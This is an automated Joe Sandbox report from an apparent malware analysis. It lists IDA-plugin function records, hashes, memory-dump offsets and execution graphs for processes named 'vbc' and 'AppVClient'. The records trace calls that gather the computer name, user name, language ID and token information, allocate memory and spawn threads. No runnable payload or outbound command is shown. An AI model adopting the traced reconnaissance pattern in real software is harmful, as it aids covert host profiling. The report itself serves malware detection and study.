                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: b056509ead364be8d131f1d07558fcec7e68cae0d362a295ecab7e0dac22b6ca
                                                                                                                                                                      • Instruction ID: afd5351c16bd8d3214f100b390c51bb2592c37e35d57f28e7a5c581517f71fb1
                                                                                                                                                                      • Opcode Fuzzy Hash: b056509ead364be8d131f1d07558fcec7e68cae0d362a295ecab7e0dac22b6ca
                                                                                                                                                                      • Instruction Fuzzy Hash: E3D0A934009347AA97036A405C889B93B24BEC3320B5442AAF8A1041E2832C482AB722
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4C14B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: a22fd4684bcd025d9d875fe7eb221d981aed75c7b1b53597d92982027d44c515
                                                                                                                                                                      • Instruction ID: e5746117e74c4f8965fb07f544566e2b7f97b9b2db4fe78c808a1e92b9fc67a3
                                                                                                                                                                      • Opcode Fuzzy Hash: a22fd4684bcd025d9d875fe7eb221d981aed75c7b1b53597d92982027d44c515
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CC08C2150E7C71FD703033028281497F613D031583CD00C7C4D0CA0DB828A40088B52
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4F26C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: f33ebe2f7134118f245645ea1797016b149447cbc0fbf348ae3c45991ab4a465
                                                                                                                                                                      • Instruction ID: f8287c26822fd91a0aa8271af4058af3314d2d3da86f6c9d708bb702029bb548
                                                                                                                                                                      • Opcode Fuzzy Hash: f33ebe2f7134118f245645ea1797016b149447cbc0fbf348ae3c45991ab4a465
                                                                                                                                                                      • Instruction Fuzzy Hash: D0C09B361452465FE70097D4DC5B7813FE0FE073107C90481994087150CB68A016EB02
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B0D0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 91728b174b563eb17167a93fa6722b61c06da62623eff81193e248388853552c
                                                                                                                                                                      • Instruction ID: 13106e9898e9557be7e579ea4b65cce156e48869c5738432e723acaf4897f02a
                                                                                                                                                                      • Opcode Fuzzy Hash: 91728b174b563eb17167a93fa6722b61c06da62623eff81193e248388853552c
                                                                                                                                                                      • Instruction Fuzzy Hash: C7C04C6150D3C84EEB138B3548582AA3FF45D03255B59109BDDA2C64A3D714C94CE753
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 070BF80E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2669985021.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_70b0000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 0698240d4224d3af33d10784ad27dff34b616bc0ad551c53fae00ebc3827c4e1
                                                                                                                                                                      • Instruction ID: fc97f5ba51318b5ebde931b56c518a70db8bc71335e963c7f79bbff50df7ddce
                                                                                                                                                                      • Opcode Fuzzy Hash: 0698240d4224d3af33d10784ad27dff34b616bc0ad551c53fae00ebc3827c4e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D31AAB4D012199FCB24CFAAD985ADEFBB4EB49310F14952AE815B7340C735A901CFA8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cd5ab733aa6cd1fd1e91305b4c87389bbe8241a78b5b3fb38630f44ba5032426
                                                                                                                                                                      • Instruction ID: c394384a9c261baa73dee6decc576d85449e9bcdf306c114f24a8145c32b9e10
                                                                                                                                                                      • Opcode Fuzzy Hash: cd5ab733aa6cd1fd1e91305b4c87389bbe8241a78b5b3fb38630f44ba5032426
                                                                                                                                                                      • Instruction Fuzzy Hash: C0E08651D4CF00BBE63A37A85C1EBB1AE70AF13F3DF4D045AAE40550A796581C00F711
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F45D6D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: 9b2100d64acd10f7036f46ddfc294f377e79af48fbb04402684876aa01600634
                                                                                                                                                                      • Instruction ID: dbe962482535b38b9a0cf3ecebc876abed9e0e2ab343334733ac3a4fdf820607
                                                                                                                                                                      • Opcode Fuzzy Hash: 9b2100d64acd10f7036f46ddfc294f377e79af48fbb04402684876aa01600634
                                                                                                                                                                      • Instruction Fuzzy Hash: 8BD0C920E0CF149BED3D3214FACC7302D345F10F30E0C8201AD011D2B745524C07BA02
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 1ef981bd04a06d70a26eddb2e716912d4fb566df8dc381bf589b42a4e69392cf
                                                                                                                                                                      • Instruction ID: 8efa8fa670040a9606c6210b3c9e94b7f4a30c1b9a47c56fa0954607606fc931
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ef981bd04a06d70a26eddb2e716912d4fb566df8dc381bf589b42a4e69392cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 50B092A2909A80CEF7021A602C1D2E83F70E9123C6B090053CD42C8223EA188A067722
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f083304abe81794d3b0e47986d38e8889e7e911a392f4e44a590b25f2d021ca2
                                                                                                                                                                      • Instruction ID: d763a45f87a15734f583b3d34430219741f5c5ac92ea16b95d01b34a411e2b2e
                                                                                                                                                                      • Opcode Fuzzy Hash: f083304abe81794d3b0e47986d38e8889e7e911a392f4e44a590b25f2d021ca2
                                                                                                                                                                      • Instruction Fuzzy Hash: 272136F9614608DFEB14DF50D9D0B16BFA5EB88320F648169D80D0F286C336D846CAE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a06cec78edd30c5fa5f5d2641735210642f11197391936beb708901091f7d337
                                                                                                                                                                      • Instruction ID: 481e48a127a23d95bd15e2179aaaa0f9a71a3d483e464aa786ad7d0744658cf9
                                                                                                                                                                      • Opcode Fuzzy Hash: a06cec78edd30c5fa5f5d2641735210642f11197391936beb708901091f7d337
                                                                                                                                                                      • Instruction Fuzzy Hash: D711E1B6604684CFDB15CF50D5D4B16BFA2FB84320F24C1A9D84C0B256C336D456CBA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3515c95cdb0e917eb9a8ef311d02bfe007e26ba02a455afbcd9a93722f45b33d
                                                                                                                                                                      • Instruction ID: 796060c4c692afbbd1288271fb4ae713c6f1c30a08f708410c63e7d14c67d51a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3515c95cdb0e917eb9a8ef311d02bfe007e26ba02a455afbcd9a93722f45b33d
                                                                                                                                                                      • Instruction Fuzzy Hash: AD015EB154D3C09FE7124B258C94792BFA8EF43224F1981DBE8888F1E3C2685C45CBB2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: af9010683592200ecdfba12f3104a341d4fbe52e573bca7fdd3ed976d8e525fe
                                                                                                                                                                      • Instruction ID: 1d76c69723ec7d82b65edd1c111eefef4c217365c2412044dbc07f4b09815943
                                                                                                                                                                      • Opcode Fuzzy Hash: af9010683592200ecdfba12f3104a341d4fbe52e573bca7fdd3ed976d8e525fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 6601D4F06143409AF7204A51C884B67BFCCEF42225F08C059DC4C0B5C2C2789845CAF6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2613234924.0000000000550000.00000040.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_550000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: \I&$"pEl$'5PO$-N$w$-bY{$1m?$7c}:$=kF($B{,:$[4.*$^o}b$`.<>$f^>($nh2/$tN<z$zgRr${zi${95$c~t$cT$yS2
                                                                                                                                                                      • API String ID: 0-2956041983
                                                                                                                                                                      • Opcode ID: 5e536528996ec904011261ce2b9d3f9d546e9900a2f0e9b8f4598563413a5573
                                                                                                                                                                      • Instruction ID: 5ed38cbd2bea678983f08c358428fba645e292bf2ea16cc994f085502f92ce8c
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e536528996ec904011261ce2b9d3f9d546e9900a2f0e9b8f4598563413a5573
                                                                                                                                                                      • Instruction Fuzzy Hash: 2212C976442341CFCB8A8F26A2CA7D63B64BF15325F9C92B89D0D4D42BCB344684CF66
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2613234924.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Offset: 004A5000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_4a5000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 24edfe86f89d863c459ef98baa66fa58558c940872ab27ebaee6b55c6d3c4fc8
                                                                                                                                                                      • Instruction ID: 62a600dcc4178c58a7e9bbd4a1ca1ef9aeebb4c8c88d6bcaac42d4d958bd671a
                                                                                                                                                                      • Opcode Fuzzy Hash: 24edfe86f89d863c459ef98baa66fa58558c940872ab27ebaee6b55c6d3c4fc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6011C23026EB928FD316DF38C489645BFE1EF063247594ADDC0868F1A3C36AA442CB17

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                      Signature Coverage:3.9%
                                                                                                                                                                      Total number of Nodes:102
                                                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                                                      execution_graph 5699 b652b7 5700 b652b0 5699->5700 5703 b652c4 5699->5703 5701 b653c4 GetSystemDefaultLangID 5702 b65475 5701->5702 5703->5700 5703->5701 5710 b652f4 5712 b652cb 5710->5712 5711 b652b0 5712->5711 5713 b653c4 GetSystemDefaultLangID 5712->5713 5713->5711 5704 b68090 5706 b68075 5704->5706 5705 b68186 CloseHandle 5705->5706 5706->5705 5707 b680a7 5706->5707 5708 b680ca GetTokenInformation 5706->5708 5709 b681ad GetTokenInformation 5706->5709 5708->5706 5709->5706 5725 b657f0 5728 b655ac 5725->5728 5726 b655e4 5728->5725 5728->5726 5729 b83870 5728->5729 5730 b83876 5729->5730 5732 b83893 5730->5732 5733 b83720 5730->5733 5732->5728 5734 b70c42 5733->5734 5734->5733 5735 b6e050 VirtualAlloc 5734->5735 5736 b837dd 5734->5736 5735->5734 5736->5732 5736->5736 5693 b681b1 5697 b68075 5693->5697 5694 b68186 CloseHandle 5694->5697 5695 b681ad GetTokenInformation 5695->5697 5696 b680ca GetTokenInformation 5696->5697 5697->5694 5697->5695 5697->5696 5698 b680a7 5697->5698 5634 b65b87 CreateThread 5635 b65b1c 5634->5635 5643 b65810 5634->5643 5636 b65c20 5635->5636 5637 b65c01 CloseHandle 5635->5637 5638 b65cdf CreateThread 5635->5638 5640 b65d37 5637->5640 5638->5635 5638->5637 5641 b654a0 5638->5641 5642 b654b5 5641->5642 5644 b65822 5643->5644 5775 b65347 5779 b652cb 5775->5779 5776 b653c4 GetSystemDefaultLangID 5777 b65475 5776->5777 5778 b652b0 5779->5776 5779->5778 5650 b65b42 5652 b65b07 5650->5652 5652->5650 5655 b65bb4 5652->5655 5657 b65b68 5652->5657 5658 b652a0 5652->5658 5653 b65cdf CreateThread 5654 b65c01 CloseHandle 5653->5654 5653->5655 5662 b654a0 5653->5662 5654->5657 5655->5653 5655->5654 5655->5657 5661 b652ab 5658->5661 5659 b653c4 GetSystemDefaultLangID 5660 b652b0 5659->5660 5660->5652 5661->5659 5661->5660 5737 b65be2 5738 b65bfc CloseHandle 5737->5738 5740 b65be7 5737->5740 
5738->5740 5663 b65b00 5664 b65bba 5663->5664 5671 b752c0 5664->5671 5666 b65bc7 5670 b65bde 5666->5670 5676 b80080 5666->5676 5670->5670 5672 b752c6 5671->5672 5673 b752ce 5671->5673 5672->5673 5690 b6e050 5672->5690 5673->5666 5677 b80089 5676->5677 5678 b803e0 GetComputerNameW 5677->5678 5679 b80181 VirtualFree 5677->5679 5680 b6e050 VirtualAlloc 5677->5680 5681 b803bf GetUserNameW 5677->5681 5682 b65c7b 5677->5682 5683 b804d6 GetComputerNameW 5677->5683 5678->5677 5679->5677 5680->5677 5681->5677 5684 b68070 5682->5684 5683->5677 5686 b68075 5684->5686 5685 b68186 CloseHandle 5685->5686 5686->5685 5687 b681ad GetTokenInformation 5686->5687 5688 b680ca GetTokenInformation 5686->5688 5689 b680a7 5686->5689 5687->5686 5688->5686 5689->5670 5691 b6e0c3 5690->5691 5692 b6e0d8 VirtualAlloc 5691->5692 5692->5691 5714 b65860 5715 b752c0 VirtualAlloc 5714->5715 5716 b65869 5715->5716 5717 b80080 5 API calls 5716->5717 5718 b6587d 5717->5718 5719 b68070 3 API calls 5718->5719 5720 b65870 5719->5720 5741 b655ef 5744 b655ac 5741->5744 5742 b83870 VirtualAlloc 5742->5744 5743 b655e4 5744->5742 5744->5743 5751 b65b09 5752 b65b16 5751->5752 5753 b65c20 5752->5753 5754 b65c01 CloseHandle 5752->5754 5755 b65cdf CreateThread 5752->5755 5757 b65d37 5754->5757 5755->5752 5755->5754 5758 b654a0 5755->5758 5757->5757

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 306 b652a0-b653fe 311 ba0d4c-ba0d4e 306->311 312 b65400-b65424 306->312 314 b6542a 312->314 315 b6539b 312->315 314->315 316 b65430-b6543e 314->316 317 b65413-b65419 315->317 318 b6539d-b653a1 315->318 321 b65441-b6544a 316->321 319 b653a7 318->319 320 b652b0-b652b5 318->320 319->320 322 b653ad 319->322 327 b653c4-b653ca GetSystemDefaultLangID 321->327 328 b65450 321->328 323 b653f3-b653f9 322->323 324 b653af 322->324 334 b65355 323->334 335 b6532a 323->335 326 b653e0-b653f1 324->326 326->317 326->323 329 b65475-b6547b 327->329 336 b65411 328->336 337 b653c1 328->337 329->311 341 b652d1-b652e7 334->341 342 b652e8-b65363 334->342 335->334 338 b6532c-b6533f 335->338 336->317 336->327 337->336 340 b653c3 337->340 343 b6536b-b6536f 338->343 341->342 347 b65365 342->347 348 b653d1-b653d5 342->348 343->321 346 b65375-b65390 343->346 346->340 352 b65392-b6539a 346->352 347->348 351 b65367-b65369 347->351 348->318 350 b653d7 348->350 350->326 353 b65342-b65345 350->353 351->343 352->318 353->312 354 b6534b 353->354 354->312 355 b65351-b65353 354->355 355->334
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00B653C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 9805ffbf04b2642cadfc8c284029357ac88f1d5d5b5fe3fc2da0b151244bfce2
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 2841E5A240DE958FD736432448A42707BD0EB227E2F9D01E7D4C78A3E6E59C0CB1972A

Control-flow Graph (graph image not extracted; API calls labelled in the graph: GetComputerNameW, GetUserNameW, VirtualFree)
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: eae33134d0fc381eaa36187e6219b49d6e3437180a0cb7e80f9b51d646616384
• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: FBD10431568B0D8BC7A4FF58D8897EAB3E1FBA0350F18469EE846C3174DA749649C7C2

Control-flow Graph (graph image not extracted; API calls labelled in the graph: CloseHandle, GetTokenInformation)
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction ID: b6f8a60212a43e3ca5ac16d149e307f47120f5f188d68b34a7f1b0ebfd8a7ec0
• Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction Fuzzy Hash: E9614B7050CA459FCB658B2888A47357BE0FB5A350F640BDAE44BD31A1DF3C9C49D752

Control-flow Graph (graph image not extracted; API calls labelled in the graph: CloseHandle, CreateThread)
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 2470f97aee313f71d9ac5824af60f86f9477d10455a8160754673fc98f110ff2
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: 6F01923010DF468FDB755B248C987797BD0EB55324F2901EB8487CA0D1DEAD4920E712

Control-flow Graph (graph image not extracted; no Windows API calls labelled in the graph, internal calls only)
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: 379edc350b9d0129ca745cdca3f70a5a094096eee9ffbcaa618440fd7433c1c8
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: AFF1F82171DE488FC669B72C58916B977D2FB99310F5846DFE09FC32A6DD289C06C382

Control-flow Graph (graph image not extracted; API calls labelled in the graph: CreateThread, CloseHandle)
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: fb12567052542f99b70d32704541f275c001d25d8e27eb0aa47124da14fed7be
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: 4421AF3120CF458FCB7A9B1888A8B746AE1EB55350F6C05F69447CF1E2CA2CDC649766

Control-flow Graph (graph image not extracted; API calls labelled in the graph: CreateThread, CloseHandle)
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: 59be04fab525041c89196beefdb59a0da8c1fe46af5b1595692bf82ee1c14227
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: B7E08C3060DF488FDB7A9F249D603293AE5EB88310F1902DFC48ADB1D1DF6D09168B82

Control-flow Graph (graph image not extracted; no Windows API calls labelled in the graph, internal calls only)
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: 977950c3797f21623c7fa84dcc284c5ab353265b0a03b45339df85e43af3c3da
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: FD01F97091EE84CFD77BEB58448227966D2F758320F2C06EA90CAC70D2C83C4D349B41

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at b65be2; API node in graph: CloseHandle. Basic-block and edge data omitted.]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
• Instruction ID: 8621be7e525d3fb6e797c8f9baab12645f45a1e46ec4bdfc7855cb8966be2d73
• Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
• Instruction Fuzzy Hash: 01E01231558E1ADFEA74AA18CD99E7526C0D724361F2805F18806CB150E55CDA756612

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at b68090; API nodes in graph: CloseHandle, GetTokenInformation. Basic-block and edge data omitted.]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: fb8c92b46dc05e13b51c3d2b717c90f1b945820f25872b1e695e32a29daa3a96
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: B7C08CB0128C0697523A02482C0B0B026C0C30F350B0C03C68C42A0220DD2D8E030097

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at b6817f; API nodes in graph: CloseHandle, GetTokenInformation. Basic-block and edge data omitted.]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 1fc8fc8f7ba33a23edcdf1795213bfa5c9a16757eeeca68d844bcb8cc8b9b9b4
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: 4EC092B055891987513A26882C0A0B235D0C71F760F0C47D2EC56BA361DD6D8E4341A2

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 97.3%
Signature Coverage: 0%
Total number of Nodes: 73
